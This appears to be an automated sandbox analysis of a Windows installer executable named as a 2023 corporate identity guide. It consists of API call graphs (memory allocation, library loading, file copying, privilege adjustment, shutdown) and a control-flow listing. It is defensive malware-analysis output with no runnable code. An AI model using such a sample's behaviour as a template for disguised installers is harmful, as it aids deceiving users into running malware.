4513->4514 4514->4513 4515->4419 4516->4424 4528 40427d 4517->4528 4519 405418 4523 40543f 4519->4523 4531 401389 4519->4531 4520 40427d SendMessageW 4521 405451 OleUninitialize 4520->4521 4521->4453 4523->4520 4524->4510 4526 4062dc 17 API calls 4525->4526 4527 403d47 SetWindowTextW 4526->4527 4527->4513 4529 404295 4528->4529 4530 404286 SendMessageW 4528->4530 4529->4519 4530->4529 4533 401390 4531->4533 4532 4013fe 4532->4519 4533->4532 4534 4013cb MulDiv SendMessageW 4533->4534 4534->4533 4536 403923 4535->4536 4537 4038ed 4536->4537 4538 403928 FreeLibrary GlobalFree 4536->4538 4537->4473 4538->4537 4538->4538 5352 40190f 5353 402c41 17 API calls 5352->5353 5354 401916 5353->5354 5355 405920 MessageBoxIndirectW 5354->5355 5356 40191f 5355->5356 5357 6f3d166d 5358 6f3d1516 GlobalFree 5357->5358 5359 6f3d1685 5358->5359 5360 6f3d16cb GlobalFree 5359->5360 5361 6f3d16a0 5359->5361 5362 6f3d16b7 VirtualFree 5359->5362 5361->5360 5362->5360 5363 401491 5364 405322 24 API calls 5363->5364 5365 401498 5364->5365 5366 401d14 5367 402c1f 17 API calls 5366->5367 5368 401d1b 5367->5368 5369 402c1f 17 API calls 5368->5369 5370 401d27 GetDlgItem 5369->5370 5371 402592 5370->5371 4730 405296 4731 4052a6 4730->4731 4732 4052ba 4730->4732 4733 4052ac 4731->4733 4743 405303 4731->4743 4734 4052c2 IsWindowVisible 4732->4734 4735 4052e2 4732->4735 4737 40427d SendMessageW 4733->4737 4738 4052cf 4734->4738 4734->4743 4736 405308 CallWindowProcW 4735->4736 4749 404c6c 4735->4749 4739 4052b6 4736->4739 4737->4739 4744 404bec SendMessageW 4738->4744 4743->4736 4745 404c4b SendMessageW 4744->4745 4746 404c0f GetMessagePos ScreenToClient SendMessageW 4744->4746 4747 404c43 4745->4747 4746->4747 4748 404c48 4746->4748 4747->4735 4748->4745 4758 4062ba lstrcpynW 4749->4758 4751 404c7f 4759 406201 wsprintfW 4751->4759 4753 404c89 4754 40140b 2 API calls 4753->4754 4755 404c92 4754->4755 4760 4062ba lstrcpynW 4755->4760 4757 404c99 4757->4743 4758->4751 4759->4753 4760->4757 5372 402598 5373 4025c7 5372->5373 5374 4025ac 5372->5374 5375 4025fb 5373->5375 5376 4025cc 5373->5376 5377 402c1f 17 API calls 5374->5377 5379 402c41 17 API calls 5375->5379 5378 402c41 17 API calls 5376->5378 5384 4025b3 5377->5384 5380 4025d3 WideCharToMultiByte lstrlenA 5378->5380 5381 402602 lstrlenW 5379->5381 5380->5384 5381->5384 5382 40262f 5383 402645 5382->5383 5385 405e62 WriteFile 5382->5385 5384->5382 5384->5383 5386 405e91 5 API calls 5384->5386 5385->5383 5386->5382 5387 6f3d10e1 5396 6f3d1111 5387->5396 5388 6f3d11d8 GlobalFree 5389 6f3d12ba 2 API calls 5389->5396 5390 6f3d11d3 5390->5388 5391 6f3d11f8 GlobalFree 5391->5396 5392 6f3d1272 2 API calls 5395 6f3d11c4 GlobalFree 5392->5395 5393 6f3d1164 GlobalAlloc 5393->5396 5394 6f3d12e1 lstrcpyW 5394->5396 5395->5396 5396->5388 5396->5389 5396->5390 5396->5391 5396->5392 5396->5393 5396->5394 5396->5395 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 SendMessageW 4897->4899 4900 404d9c 4898->4900 4899->4898 4902 404dab 4900->4902 4903 404dd3 4900->4903 4901 404fed 4908 405099 4901->4908 4914 405281 4901->4914 4915 405046 SendMessageW 4901->4915 4904 4062dc 17 API calls 4902->4904 4907 404231 18 API calls 4903->4907 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4901 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4901 4917 404fdf SendMessageW 4906->4917 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4918 4050d4 4911->4918 4924 4050c4 4911->4924 4925 4050bd ImageList_Destroy 4911->4925 4919 404bec 5 API calls 4912->4919 4920 404231 18 API calls 4913->4920 4916 404298 8 API calls 4914->4916 4915->4914 4922 40505b SendMessageW 4915->4922 4923 40528f 4916->4923 4917->4901 4921 405243 4918->4921 4942 404c6c 4 API calls 4918->4942 4947 40510f 4918->4947 4941 404f7a 4919->4941 4928 404df5 4920->4928 4921->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4921->4930 4929 40506e 4922->4929 4924->4918 4926 4050cd GlobalFree 4924->4926 4925->4924 4926->4918 4927 404eca GetWindowLongW SetWindowLongW 4931 404ee3 4927->4931 4928->4927 4934 404e45 SendMessageW 4928->4934 4936 404ec4 4928->4936 4939 404e81 SendMessageW 4928->4939 4940 404e92 SendMessageW 4928->4940 4935 40507f SendMessageW 4929->4935 4930->4914 4932 404f01 4931->4932 4933 404ee9 ShowWindow 4931->4933 4953 404266 SendMessageW 4932->4953 4952 404266 SendMessageW 4933->4952 4934->4928 4935->4908 4936->4927 4936->4931 4939->4928 4940->4928 4941->4906 4942->4947 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4921 4945 40522f 4944->4945 4954 404ba7 4945->4954 4946 40513d SendMessageW 4948 405153 4946->4948 4947->4946 4947->4948 4948->4944 4949 4051b4 4948->4949 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4951 4951->4948 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4921 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 17 API calls 4960->4961 4962 404b66 4961->4962 4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 4964->4956 5397 40149e 5398 4014ac PostQuitMessage 5397->5398 5399 4022f7 5397->5399 5398->5399 5400 401c1f 5401 402c1f 17 API calls 5400->5401 5402 401c26 5401->5402 5403 402c1f 17 API calls 5402->5403 5404 401c33 5403->5404 5405 402c41 17 API calls 5404->5405 5408 401c48 5404->5408 5405->5408 5406 401c63 5411 402c1f 17 API calls 5406->5411 5407 401caf 5412 402c41 17 API calls 5407->5412 5409 402c41 17 API calls 5408->5409 5410 401c58 5408->5410 5409->5410 5410->5406 5410->5407 5413 401c68 5411->5413 5414 401cb4 5412->5414 5415 402c1f 17 API calls 5413->5415 5416 402c41 17 API calls 5414->5416 5417 401c74 5415->5417 5418 401cbd FindWindowExW 5416->5418 5419 401c81 SendMessageTimeoutW 5417->5419 5420 401c9f SendMessageW 5417->5420 5421 401cdf 5418->5421 5419->5421 5420->5421 5422 402aa0 SendMessageW 5423 402ac5 5422->5423 5424 402aba InvalidateRect 5422->5424 5424->5423 5425 402821 5426 402827 5425->5426 5427 402ac5 5426->5427 5428 40282f FindClose 5426->5428 5428->5427 5429 4043a1 lstrlenW 5430 4043c0 5429->5430 5431 4043c2 WideCharToMultiByte 5429->5431 5430->5431 5432 404722 5433 40474e 5432->5433 5434 40475f 5432->5434 5493 405904 GetDlgItemTextW 5433->5493 5436 40476b GetDlgItem 5434->5436 5441 4047ca 5434->5441 5439 40477f 5436->5439 5437 4048ae 5442 404a5d 5437->5442 5495 405904 GetDlgItemTextW 5437->5495 5438 404759 5440 40654e 5 API calls 5438->5440 5444 404793 SetWindowTextW 5439->5444 5445 405c3a 4 API calls 5439->5445 5440->5434 5441->5437 5441->5442 5446 4062dc 17 API calls 5441->5446 5449 404298 8 API calls 5442->5449 5448 404231 18 API calls 5444->5448 5450 404789 5445->5450 5451 40483e SHBrowseForFolderW 5446->5451 5447 4048de 5452 405c97 18 API calls 5447->5452 5453 4047af 5448->5453 5454 404a71 5449->5454 5450->5444 5458 405b8f 3 API calls 5450->5458 5451->5437 5455 404856 CoTaskMemFree 5451->5455 5456 4048e4 5452->5456 5457 404231 18 API calls 5453->5457 5459 405b8f 3 API calls 5455->5459 5496 4062ba lstrcpynW 5456->5496 5460 4047bd 5457->5460 5458->5444 5461 404863 5459->5461 5494 404266 SendMessageW 5460->5494 5464 40489a SetDlgItemTextW 5461->5464 5469 4062dc 17 API calls 5461->5469 5464->5437 5465 4047c3 5467 406694 5 API calls 5465->5467 5466 4048fb 5468 406694 5 API calls 5466->5468 5467->5441 5475 404902 5468->5475 5470 404882 lstrcmpiW 5469->5470 5470->5464 5473 404893 lstrcatW 5470->5473 5471 404943 5497 4062ba lstrcpynW 5471->5497 5473->5464 5474 40494a 5476 405c3a 4 API calls 5474->5476 5475->5471 5479 405bdb 2 API calls 5475->5479 5481 40499b 5475->5481 5477 404950 GetDiskFreeSpaceW 5476->5477 5480 404974 MulDiv 5477->5480 5477->5481 5479->5475 5480->5481 5482 404a0c 5481->5482 5484 404ba7 20 API calls 5481->5484 5483 404a2f 5482->5483 5485 40140b 2 API calls 5482->5485 5498 404253 EnableWindow 5483->5498 5486 4049f9 5484->5486 5485->5483 5488 404a0e SetDlgItemTextW 5486->5488 5489 4049fe 5486->5489 5488->5482 5491 404ade 20 API calls 5489->5491 5490 404a4b 5490->5442 5492 40467b SendMessageW 5490->5492 5491->5482 5492->5442 5493->5438 5494->5465 5495->5447 5496->5466 5497->5474 5498->5490 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5499 6f3d18d9 5500 6f3d18fc 5499->5500 5501 6f3d1931 GlobalFree 5500->5501 5502 6f3d1943 5500->5502 5501->5502 5503 6f3d1272 2 API calls 5502->5503 5504 6f3d1ace GlobalFree GlobalFree 5503->5504 5505 6f3d1058 5507 6f3d1074 5505->5507 5506 6f3d10dd 5507->5506 5508 6f3d1516 GlobalFree 5507->5508 5509 6f3d1092 5507->5509 5508->5509 5510 6f3d1516 GlobalFree 5509->5510 5511 6f3d10a2 5510->5511 5512 6f3d10a9 GlobalSize 5511->5512 5513 6f3d10b2 5511->5513 5512->5513 5514 6f3d10c7 5513->5514 5515 6f3d10b6 GlobalAlloc 5513->5515 5517 6f3d10d2 GlobalFree 5514->5517 5516 6f3d153d 3 API calls 5515->5516 5516->5514 5517->5506 5518 6f3d16d4 5519 6f3d1703 5518->5519 5520 6f3d1b5f 22 API calls 5519->5520 5521 6f3d170a 5520->5521 5522 6f3d171d 5521->5522 5523 6f3d1711 5521->5523 5525 6f3d1744 5522->5525 5526 6f3d1727 5522->5526 5524 6f3d1272 2 API calls 5523->5524 5527 6f3d171b 5524->5527 5529 6f3d176e 5525->5529 5530 6f3d174a 5525->5530 5528 6f3d153d 3 API calls 5526->5528 5532 6f3d172c 5528->5532 5531 6f3d153d 3 API calls 5529->5531 5533 6f3d15b4 3 API calls 5530->5533 5531->5527 5534 6f3d15b4 3 API calls 5532->5534 5535 6f3d174f 5533->5535 5536 6f3d1732 5534->5536 5537 6f3d1272 2 API calls 5535->5537 5538 6f3d1272 2 API calls 5536->5538 5539 6f3d1755 GlobalFree 5537->5539 5541 6f3d1738 GlobalFree 5538->5541 5539->5527 5540 6f3d1769 GlobalFree 5539->5540 5540->5527 5541->5527 5542 6f3d2c57 5543 6f3d2c6f 5542->5543 5544 6f3d158f 2 API calls 5543->5544 5545 6f3d2c8a 5544->5545 5546 4028ad 5547 402c41 17 API calls 5546->5547 5549 4028bb 5547->5549 5548 4028d1 5551 405d8b 2 API calls 5548->5551 5549->5548 5550 402c41 17 API calls 5549->5550 5550->5548 5552 4028d7 5551->5552 5574 405db0 GetFileAttributesW CreateFileW 5552->5574 5554 4028e4 5555 4028f0 GlobalAlloc 5554->5555 5556 402987 5554->5556 5557 402909 5555->5557 5558 40297e CloseHandle 5555->5558 5559 4029a2 5556->5559 5560 40298f DeleteFileW 5556->5560 5575 403347 SetFilePointer 5557->5575 5558->5556 5560->5559 5562 40290f 5563 403331 ReadFile 5562->5563 5564 402918 GlobalAlloc 5563->5564 5565 402928 5564->5565 5566 40295c 5564->5566 5568 403116 31 API calls 5565->5568 5567 405e62 WriteFile 5566->5567 5569 402968 GlobalFree 5567->5569 5573 402935 5568->5573 5570 403116 31 API calls 5569->5570 5572 40297b 5570->5572 5571 402953 GlobalFree 5571->5566 5572->5558 5573->5571 5574->5554 5575->5562 5576 401a30 5577 402c41 17 API calls 5576->5577 5578 401a39 ExpandEnvironmentStringsW 5577->5578 5579 401a4d 5578->5579 5581 401a60 5578->5581 5580 401a52 lstrcmpW 5579->5580 5579->5581 5580->5581 4539 402032 4540 402044 4539->4540 4541 4020f6 4539->4541 4542 402c41 17 API calls 4540->4542 4543 401423 24 API calls 4541->4543 4544 40204b 4542->4544 4550 402250 4543->4550 4545 402c41 17 API calls 4544->4545 4546 402054 4545->4546 4547 40206a LoadLibraryExW 4546->4547 4548 40205c GetModuleHandleW 4546->4548 4547->4541 4549 40207b 4547->4549 4548->4547 4548->4549 4562 406703 WideCharToMultiByte 4549->4562 4553 4020c5 4555 405322 24 API calls 4553->4555 4554 40208c 4556 402094 4554->4556 4557 4020ab 4554->4557 4558 40209c 4555->4558 4559 401423 24 API calls 4556->4559 4565 6f3d1777 4557->4565 4558->4550 4560 4020e8 FreeLibrary 4558->4560 4559->4558 4560->4550 4563 40672d GetProcAddress 4562->4563 4564 402086 4562->4564 4563->4564 4564->4553 4564->4554 4566 6f3d17aa 4565->4566 4607 6f3d1b5f 4566->4607 4568 6f3d17b1 4569 6f3d18d6 4568->4569 4570 6f3d17c9 4568->4570 4571 6f3d17c2 4568->4571 4569->4558 4641 6f3d2394 4570->4641 4657 6f3d2352 4571->4657 4576 6f3d182d 4581 6f3d187e 4576->4581 4582 6f3d1833 4576->4582 4577 6f3d180f 4670 6f3d2569 4577->4670 4578 6f3d17df 4580 6f3d17e5 4578->4580 4585 6f3d17f0 4578->4585 4579 6f3d17f8 4591 6f3d17ee 4579->4591 4667 6f3d2d37 4579->4667 4580->4591 4651 6f3d2aac 4580->4651 4589 6f3d2569 10 API calls 4581->4589 4689 6f3d15c6 4582->4689 4584 6f3d1815 4681 6f3d15b4 4584->4681 4661 6f3d2724 4585->4661 4594 6f3d186f 4589->4594 4591->4576 4591->4577 4599 6f3d18c5 4594->4599 4695 6f3d252c 4594->4695 4596 6f3d17f6 4596->4591 4597 6f3d2569 10 API calls 4597->4594 4599->4569 4602 6f3d18cf GlobalFree 4599->4602 4602->4569 4604 6f3d18b1 4604->4599 4699 6f3d153d wsprintfW 4604->4699 4605 6f3d18aa FreeLibrary 4605->4604 4702 6f3d121b GlobalAlloc 4607->4702 4609 6f3d1b83 4703 6f3d121b GlobalAlloc 4609->4703 4611 6f3d1da9 GlobalFree GlobalFree GlobalFree 4612 6f3d1dc6 4611->4612 4627 6f3d1e10 4611->4627 4614 6f3d2192 4612->4614 4621 6f3d1ddb 4612->4621 4612->4627 4613 6f3d1c64 GlobalAlloc 4636 6f3d1b8e 4613->4636 4615 6f3d21b4 GetModuleHandleW 4614->4615 4614->4627 4618 6f3d21da 4615->4618 4619 6f3d21c5 LoadLibraryW 4615->4619 4616 6f3d1caf lstrcpyW 4620 6f3d1cb9 lstrcpyW 4616->4620 4617 6f3d1ccd GlobalFree 4617->4636 4710 6f3d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4618->4710 4619->4618 4619->4627 4620->4636 4621->4627 4706 6f3d122c 4621->4706 4623 6f3d222c 4625 6f3d2239 lstrlenW 4623->4625 4623->4627 4711 6f3d161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4625->4711 4626 6f3d2064 4709 6f3d121b GlobalAlloc 4626->4709 4627->4568 4628 6f3d21ec 4628->4623 4639 6f3d2216 GetProcAddress 4628->4639 4629 6f3d20ec 4629->4627 4634 6f3d2134 lstrcpyW 4629->4634 4632 6f3d1d0b 4632->4636 4704 6f3d158f GlobalSize GlobalAlloc 4632->4704 4633 6f3d1fa5 GlobalFree 4633->4636 4634->4627 4635 6f3d2253 4635->4627 4636->4611 4636->4613 4636->4616 4636->4617 4636->4620 4636->4626 4636->4627 4636->4629 4636->4632 4636->4633 4637 6f3d122c 2 API calls 4636->4637 4637->4636 4639->4623 4640 6f3d206d 4640->4568 4643 6f3d23ac 4641->4643 4642 6f3d122c GlobalAlloc lstrcpynW 4642->4643 4643->4642 4645 6f3d24d5 GlobalFree 4643->4645 4647 6f3d247f GlobalAlloc CLSIDFromString 4643->4647 4648 6f3d2454 GlobalAlloc WideCharToMultiByte 4643->4648 4650 6f3d249e 4643->4650 4713 6f3d12ba 4643->4713 4645->4643 4646 6f3d17cf 4645->4646 4646->4578 4646->4579 4646->4591 4647->4645 4648->4645 4650->4645 4717 6f3d26b8 4650->4717 4653 6f3d2abe 4651->4653 4652 6f3d2b63 ReadFile 4654 6f3d2b81 4652->4654 4653->4652 4720 6f3d2a56 4654->4720 4656 6f3d2c4d 4656->4591 4658 6f3d2367 4657->4658 4659 6f3d2372 GlobalAlloc 4658->4659 4660 6f3d17c8 4658->4660 4659->4658 4660->4570 4665 6f3d2754 4661->4665 4662 6f3d27ef GlobalAlloc 4666 6f3d2812 4662->4666 4663 6f3d2802 4664 6f3d2808 GlobalSize 4663->4664 4663->4666 4664->4666 4665->4662 4665->4663 4666->4596 4668 6f3d2d42 4667->4668 4669 6f3d2d82 GlobalFree 4668->4669 4724 6f3d121b GlobalAlloc 4670->4724 4672 6f3d25ec MultiByteToWideChar 4678 6f3d2573 4672->4678 4673 6f3d261f lstrcpynW 4673->4678 4674 6f3d260e StringFromGUID2 4674->4678 4675 6f3d2632 wsprintfW 4675->4678 4676 6f3d2656 GlobalFree 4676->4678 4677 6f3d268b GlobalFree 4677->4584 4678->4672 4678->4673 4678->4674 4678->4675 4678->4676 4678->4677 4679 6f3d1272 2 API calls 4678->4679 4725 6f3d12e1 4678->4725 4679->4678 4729 6f3d121b GlobalAlloc 4681->4729 4683 6f3d15b9 4684 6f3d15c6 2 API calls 4683->4684 4685 6f3d15c3 4684->4685 4686 6f3d1272 4685->4686 4687 6f3d127b GlobalAlloc lstrcpynW 4686->4687 4688 6f3d12b5 GlobalFree 4686->4688 4687->4688 4688->4594 4690 6f3d15ff lstrcpyW 4689->4690 4691 6f3d15d2 wsprintfW 4689->4691 4694 6f3d1618 4690->4694 4691->4694 4694->4597 4696 6f3d1891 4695->4696 4697 6f3d253a 4695->4697 4696->4604 4696->4605 4697->4696 4698 6f3d2556 GlobalFree 4697->4698 4698->4697 4700 6f3d1272 2 API calls 4699->4700 4701 6f3d155e 4700->4701 4701->4599 4702->4609 4703->4636 4705 6f3d15ad 4704->4705 4705->4632 4712 6f3d121b GlobalAlloc 4706->4712 4708 6f3d123b lstrcpynW 4708->4627 4709->4640 4710->4628 4711->4635 4712->4708 4714 6f3d12c1 4713->4714 4715 6f3d122c 2 API calls 4714->4715 4716 6f3d12df 4715->4716 4716->4643 4718 6f3d271c 4717->4718 4719 6f3d26c6 VirtualAlloc 4717->4719 4718->4650 4719->4718 4721 6f3d2a61 4720->4721 4722 6f3d2a66 GetLastError 4721->4722 4723 6f3d2a71 4721->4723 4722->4723 4723->4656 4724->4678 4726 6f3d130c 4725->4726 4727 6f3d12ea 4725->4727 4726->4678 4727->4726 4728 6f3d12f0 lstrcpyW 4727->4728 4728->4726 4729->4683 5587 402a35 5588 402c1f 17 API calls 5587->5588 5589 402a3b 5588->5589 5590 402a72 5589->5590 5591 40288b 5589->5591 5593 402a4d 5589->5593 5590->5591 5592 4062dc 17 API calls 5590->5592 5592->5591 5593->5591 5595 406201 wsprintfW 5593->5595 5595->5591 5596 401735 5597 402c41 17 API calls 5596->5597 5598 40173c SearchPathW 5597->5598 5599 4029e6 5598->5599 5600 401757 5598->5600 5600->5599 5602 4062ba lstrcpynW 5600->5602 5602->5599 5603 4014b8 5604 4014be 5603->5604 5605 401389 2 API calls 5604->5605 5606 4014c6 5605->5606 5607 401db9 GetDC 5608 402c1f 17 API calls 5607->5608 5609 401dcb GetDeviceCaps MulDiv ReleaseDC 5608->5609 5610 402c1f 17 API calls 5609->5610 5611 401dfc 5610->5611 5612 4062dc 17 API calls 5611->5612 5613 401e39 CreateFontIndirectW 5612->5613 5614 402592 5613->5614 5615 40283b 5616 402843 5615->5616 5617 402847 FindNextFileW 5616->5617 5618 402859 5616->5618 5617->5618 5619 4029e6 5618->5619 5621 4062ba lstrcpynW 5618->5621 5621->5619

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0040338F Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 8 4033d8 1->8 3 4033e4-4033f8 call 406624 lstrlenA 2->3 9 4033fa-403416 call 406694 * 3 3->9 8->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 22 403420 17->22 22->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 31 4034b8-4034bd 28->31 32 4034bf-4034c3 28->32 36 403633-40364d DeleteFileW call 402edd 29->36 37 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->37 31->31 31->32 34 4034c5-4034c9 32->34 35 4034ca-4034ce 32->35 34->35 38 4034d4-4034da 35->38 39 40358d-40359a call 405bbc 35->39 57 403653-403659 36->57 58 4036fe-40370e call 4038d0 OleUninitialize 36->58 37->36 54 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 37->54 43 4034f5-40352e 38->43 44 4034dc-4034e4 38->44 55 40359c-40359d 39->55 56 40359e-4035a4 39->56 45 403530-403535 43->45 46 40354b-403585 43->46 50 4034e6-4034e9 44->50 51 4034eb 44->51 45->46 52 403537-40353f 45->52 46->39 53 403587-40358b 46->53 50->43 50->51 51->43 60 403541-403544 52->60 61 403546 52->61 53->39 62 4035ac-4035ba call 4062ba 53->62 54->36 54->58 55->56 56->28 64 4035aa 56->64 65 4036ee-4036f5 call 4039aa 57->65 66 40365f-40366a call 405bbc 57->66 75 403834-40383a 58->75 76 403714-403724 call 405920 ExitProcess 58->76 60->46 60->61 61->46 70 4035bf 62->70 64->70 74 4036fa 65->74 77 4036b8-4036c2 66->77 78 40366c-4036a1 66->78 70->29 74->58 80 4038b8-4038c0 75->80 81 40383c-403852 GetCurrentProcess OpenProcessToken 75->81 85 4036c4-4036d2 call 405c97 77->85 86 40372a-40373e call 40588b lstrcatW 77->86 82 4036a3-4036a7 78->82 83 4038c2 80->83 84 4038c6-4038ca ExitProcess 80->84 88 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403888-403896 call 406694 81->89 90 4036b0-4036b4 82->90 91 4036a9-4036ae 82->91 83->84 85->58 99 4036d4-4036ea call 4062ba * 2 85->99 100 403740-403746 lstrcatW 86->100 101 40374b-403765 lstrcatW lstrcmpiW 86->101 88->89 102 4038a4-4038af ExitWindowsEx 89->102 103 403898-4038a2 89->103 90->82 95 4036b6 90->95 91->90 91->95 95->77 99->65 100->101 101->58 106 403767-40376a 101->106 102->80 104 4038b1-4038b3 call 40140b 102->104 103->102 103->104 104->80 110 403773 call 40586e 106->110 111 40376c-403771 call 4057f1 106->111 116 403778-403786 SetCurrentDirectoryW 110->116 111->116 118 403793-4037bc call 4062ba 116->118 119 403788-40378e call 4062ba 116->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->58 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                          • GetCommandLineW.KERNEL32(Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000020,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                            • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                            • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035EF
                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040360B
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403737
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403746
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403751
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
